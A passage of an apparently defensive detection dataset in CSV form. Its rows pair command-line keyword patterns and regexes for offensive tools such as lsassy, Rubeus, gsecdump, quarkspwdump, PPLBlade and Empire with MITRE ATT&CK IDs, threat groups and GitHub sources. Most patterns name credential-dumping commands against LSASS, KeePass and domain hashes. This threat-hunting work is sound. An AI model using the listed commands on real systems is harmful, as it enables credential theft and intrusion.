T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","956" "* dpapi_domain_backupkey.py*",".{0,1000}\sdpapi_domain_backupkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","957" "* dpapi_masterkey.py*",".{0,1000}\sdpapi_masterkey\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","958" "* DPAPImk2john.py*",".{0,1000}\sDPAPImk2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","959" "* dpipe.sh*",".{0,1000}\sdpipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","0","N/A","N/A","N/A","1","67","29","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z","960" "* dragoncastle.py*",".{0,1000}\sdragoncastle\.py.{0,1000}","offensive_tool_keyword","DragonCastle","A PoC that combines AutodialDLL Lateral Movement technique and SSP to scrape NTLM hashes from LSASS process.","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential 
Access","https://github.com/mdsecactivebreach/DragonCastle","1","0","N/A","N/A","10","3","298","38","2022-10-26T10:19:55Z","2022-10-26T10:18:37Z","961" "* DraytekScan*",".{0,1000}\sDraytekScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","962" "* 
drda-brute.nse*",".{0,1000}\sdrda\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","963" "* drda-info.nse*",".{0,1000}\sdrda\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","964" "* DriverName *Xeroxxx*",".{0,1000}\sDriverName\s.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","965" "* --drop-drag-and-drop-target*",".{0,1000}\s\-\-drop\-drag\-and\-drop\-target.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","N/A","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","FIN7","10","10","N/A","N/A","N/A","N/A","966" "* DSInternals.psd1*",".{0,1000}\sDSInternals\.psd1.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","968" "* dump * /service:*",".{0,1000}\sdump\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","969" "* dump --bucket *--dump-dir*",".{0,1000}\sdump\s\-\-bucket\s.{0,1000}\-\-dump\-dir.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","970" "* dump --usermode --kernelmode --driver *",".{0,1000}\sdump\s\-\-usermode\s\-\-kernelmode\s\-\-driver\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","971" "* dump.ps1*",".{0,1000}\sdump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","972" "* --dump_file Keepass.exe.dmp*",".{0,1000}\s\-\-dump_file\sKeepass\.exe\.dmp.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","973" "* --dump_lsa*",".{0,1000}\s\-\-dump_lsa.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","974" "* dump_memory64*",".{0,1000}\sdump_memory64.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa 
- PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rookuu/BOFs","1","0","N/A","N/A","10","10","175","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z","975" "* --dump_usedhashes*",".{0,1000}\s\-\-dump_usedhashes.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","976" "* --dump_wireless*",".{0,1000}\s\-\-dump_wireless.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","977" "* --dump-adcs*",".{0,1000}\s\-\-dump\-adcs.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","978" "* --dump-bitlocker 
*",".{0,1000}\s\-\-dump\-bitlocker\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","979" "* --dump-bitlocker*",".{0,1000}\s\-\-dump\-bitlocker.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","980" "* -DumpCerts *",".{0,1000}\s\-DumpCerts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","981" "* -DumpCred -ComputerName @*",".{0,1000}\s\-DumpCred\s\-ComputerName\s\@.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","982" "* -DumpCreds *",".{0,1000}\s\-DumpCreds\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","983" "* -DumpCreds -ComputerName *",".{0,1000}\s\-DumpCreds\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","984" "* -DumpCreds -ComputerName @*",".{0,1000}\s\-DumpCreds\s\-ComputerName\s\@.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","985" "* dumpCredStore.ps1*",".{0,1000}\sdumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","986" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","987" "* dumper.ps1*",".{0,1000}\sdumper\.ps1.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","988" "* 
dumpert.py*",".{0,1000}\sdumpert\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","989" "* -DumpForest -Users *krbtgt*",".{0,1000}\s\-DumpForest\s\-Users\s.{0,1000}krbtgt.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","990" "* --dump-gmsa*",".{0,1000}\s\-\-dump\-gmsa.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained 
delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","991" "* --dump-hash-domain --with-history*",".{0,1000}\s\-\-dump\-hash\-domain\s\-\-with\-history.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","992" "* --dump-hash-domain*",".{0,1000}\s\-\-dump\-hash\-domain.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","993" "* --dump-hash-domain-cached*",".{0,1000}\s\-\-dump\-hash\-domain\-cached.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","994" "* --dump-hash-domain-cached*",".{0,1000}\s\-\-dump\-hash\-domain\-cached.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","995" "* 
--dump-hash-local*",".{0,1000}\s\-\-dump\-hash\-local.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","996" "* --dump-laps*",".{0,1000}\s\-\-dump\-laps.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","997" "* DumpLsass.ps1*",".{0,1000}\sDumpLsass\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","998" "* dump-lsass.py*",".{0,1000}\sdump\-lsass\.py.{0,1000}","offensive_tool_keyword","impacket","Dump-lsass script using impacket - Automates the manual process of using wmiexec and procdump to dump Lsass and plaintext creds or hashes across a large number of systems.","T1021 - T1047 - T1055.011 - T1003","TA0002 - TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat 
Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Credential Access","https://github.com/kaluche/Dump-Lsass","1","0","N/A","N/A","10","1","1","0","2019-11-14T18:15:26Z","2019-11-20T20:26:27Z","999" "* --dumpmode network --network raw --ip * --port *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\sraw\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1000" "* --dumpmode network --network smb *",".{0,1000}\s\-\-dumpmode\snetwork\s\-\-network\ssmb\s.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1001" "* --dump-name *lsass*",".{0,1000}\s\-\-dump\-name\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","1002" "* --dumpname lsass.dmp*",".{0,1000}\s\-\-dumpname\slsass\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process 
